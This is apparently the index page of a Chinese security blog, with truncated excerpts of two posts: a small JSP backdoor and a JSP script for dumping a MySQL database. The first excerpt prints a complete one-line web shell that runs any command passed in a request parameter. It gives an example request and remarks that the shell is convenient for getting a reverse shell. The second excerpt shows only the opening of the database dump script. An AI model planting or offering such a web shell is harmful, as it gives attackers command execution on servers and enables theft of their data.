jsp小后门

admin 发布于 2014-12-18 02:11
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:...
标签: jsp 后门
评论(0) 浏览(13967)

JSP+MySQL脱裤脚本

admin 发布于 2014-08-11 09:00
导出路径最好写绝对路径 <%@ page language="java" import="java.util.*,java.sql.*,java.io.*" pageEncoding="utf-8"%> <% String path = request.getContextPath(); String basePath = r...
标签: mysql jsp 脱裤
评论(0) 浏览(12775)

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接